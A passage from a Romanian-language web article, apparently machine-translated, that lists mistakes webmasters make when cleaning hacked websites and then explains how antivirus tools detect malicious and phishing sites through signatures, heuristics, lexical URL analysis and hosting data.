Decizie corectă: Evident, tratarea resursei web ar trebui să fie gestionată de profesioniști. Există false pozitive în rapoartele scanerelor malware, deoarece același fragment poate fi folosit atât în ​​codul legitim, cât și în codul hacker. Este necesar să se analizeze fiecare fișier, în caz contrar elementele critice pot fi șterse, ceea ce poate duce la defecțiuni ale site-ului sau la defecțiunea completă a acestuia. Sau, dimpotrivă, există riscul de a nu recunoaște shell-ul hackerului, ceea ce va duce la reinfectarea resursei web.

Greșeala #4. Ignorarea mesajelor (în panoul webmaster) despre prezența codului rău intenționat pe site

Este posibil ca notificarea prezenței unui cod rău intenționat pe un site în panoul pentru webmasteri să nu fie permanentă. Astăzi sistemul scrie că există un virus pe site-ul tău, iar mâine va fi tăcut. Este mai plăcut pentru proprietarul site-ului să creadă că a avut loc un fel de defecțiune în sistem, iar site-ul său este dincolo de orice suspiciune. Cu toate acestea, în practică, acest lucru nu este cazul. Sunt diferite tipuri infectii. Codul rău intenționat poate apărea pe un site web doar pentru o perioadă de timp și apoi poate dispărea. Aceasta înseamnă că data viitoare când site-ul este scanat de un bot antivirus motor de căutare Malware-ul poate fi detectat, dar în altul poate să nu fie detectat. Drept urmare, webmasterul „se relaxează” și începe să ignore mesajul periculos: „De ce să pierzi timpul cu tratament, pentru că site-ul nu a fost blocat”.

Decizie corectă: dacă se observă activitate rău intenționată pe site, cel mai probabil resursa dvs. web a fost piratată și infectată. Virușii nu apar singuri pe site. Faptul că ieri un motor de căutare a descoperit un cod suspect pe site și apoi „a tăcut” nu numai că nu trebuie ignorat de webmaster, ci, dimpotrivă, ar trebui să servească drept semnal de alarmă. Cine știe cum va fi exploatată resursa ta mâine? - Spam, phishing sau redirecționări. Trebuie să scanați imediat site-ul pentru prezența ușilor din spate, shell-urilor hackerilor, tratați-l și protejați-l de hacking.

Greșeala #5. Tratarea site-urilor web de către freelanceri neprofesioniști.

În principiu, lucrul cu freelanceri în această chestiune nu este diferit de alte domenii. Ieftin - nu întotdeauna de înaltă calitate, dar aproape întotdeauna fără garanții și relații contractuale. Majoritatea freelancerilor care nu sunt specializați în problemele de securitate a site-urilor web lucrează cu consecințele unui atac de hacker, dar nu cu cauza - vulnerabilitățile site-ului. Aceasta înseamnă că site-ul poate fi spart din nou. Mai rău încă, există și interpreți fără scrupule care pot planta alt cod rău intenționat pe site, pot fura baza de date etc.

Decizia corectă: Contactați o companie specializată care se ocupă cu tratarea și protejarea site-urilor împotriva hackingului. Angajații unor astfel de companii elimină codurile rău intenționate în fiecare zi, văd mutația virușilor și monitorizează evoluția atacurile hackerilor. Piața dark hacking nu stă într-un singur loc, ea evoluează și necesită monitorizare constantă și acțiuni de răspuns adecvate în tratarea și protejarea site-ului de intruziunile neautorizate.

Greșeala #6. Eliminarea zilnică/săptămânală a aceluiași virus de pe site.

Această problemă se referă la „entuziaști” speciali care sunt gata să elimine în mod regulat consecințele hackingului. Astfel de webmasteri știu deja ce cod specific va fi adăugat pe site, exact unde și când se va întâmpla acest lucru. În acest fel, puteți lupta la nesfârșit împotriva redirecționării mobile, pe care în fiecare zi, la ora 09:30, atacatorul o injectează în fișierul .htaccess și vă redirecționează. traficul mobil către un site care vinde Viagra sau conținut porno. Numai ghinion: robotul hacker o face modul automat, și trebuie să efectuați manual operația de îndepărtare. Nu e corect, nu-i așa?

Decizie corectă: Puteți elimina la nesfârșit consecințele (viruși, redirecționări etc.), dar este mai eficient să verificați site-ul pentru scripturi rău intenționate și hacker, să le eliminați și să instalați protecție împotriva hackingului, astfel încât codul virusului să nu mai apară. Și petrece timpul liber mai eficient. Principalul lucru este să vă amintiți că hackerul are deja acces la site-ul dvs., ceea ce înseamnă că data viitoare s-ar putea să nu se limiteze la codul rău intenționat cu care sunteți familiarizat, ci să vă folosească site-ul pentru infracțiuni cibernetice mai grave.

Greșeala #7. Tratarea unui site web plin de viruși cu un antivirus pentru computerul dvs

Conceptul de „antivirus” este universal pentru unii webmasteri și încearcă să vindece un site piratat și infectat folosind un antivirus conceput pentru un computer. Se face o copie de rezervă a site-ului și se verifică cu versiunea desktop a antivirusului software. Din păcate, un astfel de tratament nu este capabil să dea rezultatele dorite.

Decizie corectă: Virușii de pe un site web și de pe un computer nu sunt același lucru. Pentru a verifica site-ul trebuie să folosiți software specializat sau să contactați specialiști. Antivirușii desktop, oricât de buni ar fi, nu sunt proiectați pentru a trata site-urile web pentru viruși, deoarece baza lor de date este concentrată pe viruși și troieni de pe computer.

Asta e tot. Nu calca pe aceeasi grebla!

În prezent majoritatea atacuri informatice se întâmplă în timpul vizitei pagini web rău intenționate. Utilizatorul poate fi păcălit să furnizeze date sensibile unui site de phishing sau să devină victima unui atac de descărcare direct care exploatează vulnerabilitățile browserului. Astfel, un antivirus modern trebuie să ofere protecție nu numai direct de malware, ci și de resursele web periculoase.

Utilizarea soluțiilor antivirus diverse metode pentru a identifica site-urile cu malware: compararea bazei de date de semnături și analiză euristică. Semnăturile sunt folosite pentru a identifica amenințările cunoscute, în timp ce analiza euristică determină probabilitatea unui comportament periculos. Folosirea unei baze de date de viruși este o metodă mai fiabilă care asigură un număr minim de fals pozitive. Cu toate acestea această metodă nu permite detectarea celor mai recente amenințări necunoscute.

O amenințare emergentă trebuie mai întâi detectată și analizată de către angajații laboratorului furnizorului de antivirus. Pe baza analizei, se creează o semnătură corespunzătoare care poate fi folosită pentru a găsi malware. În schimb, metoda euristică este folosită pentru a identifica amenințările necunoscute pe baza unor factori comportamentali suspecti. Această metodă evaluează probabilitatea pericolului, astfel încât sunt posibile alarme false.

Când sunt detectate legături rău intenționate, ambele metode pot funcționa simultan. Pentru a adăuga o resursă periculoasă la lista neagră, trebuie să efectuați o analiză prin descărcarea conținutului și scanarea acestuia folosind un antivirus sau un sistem de detectare a intruziunilor.

Mai jos este jurnalul de evenimente ale sistemului Suricata IDS la blocarea exploit-urilor:

Exemplu de raport IDS care arată amenințările identificate prin semnături:

Exemplu de avertizare Antivirus Ad-Aware când accesați un site rău intenționat:

Analiza euristică este efectuată pe partea clientului pentru a verifica ce site-uri sunt vizitate. Algoritmi special dezvoltați avertizează utilizatorul dacă resursa vizitată îndeplinește caracteristici periculoase sau suspecte. Acești algoritmi se pot baza pe analiza lexicală a conținutului sau evaluarea locației resursei. Modelul de definiție lexicală este utilizat pentru a alerta utilizatorul în timpul atacurilor de tip phishing. De exemplu adresa URL ca „ http://paaypall.5gbfree.com/index.php" sau " http://paypal-intern.de/secure/” sunt ușor de identificat ca copii phishing ale unui cunoscut sistem de plată„paypal”.

Analiza plasării resurselor colectează informații despre găzduire și numele de domeniu. Pe baza datelor primite, un algoritm specializat determină gradul de pericol al site-ului. Aceste date includ, de obicei, date geografice, informații privind registratorul și persoana care înregistrează domeniul.

Mai jos este un exemplu de găzduire a mai multor site-uri de phishing pe o singură adresă IP:

În cele din urmă, în ciuda numeroaselor modalități de a evalua site-urile, nicio metodă nu poate oferi o garanție de 100% a vă proteja sistemul. Doar partajarea mai multor tehnologii securitatea calculatorului vă permite să oferiți o anumită încredere în protecția datelor cu caracter personal.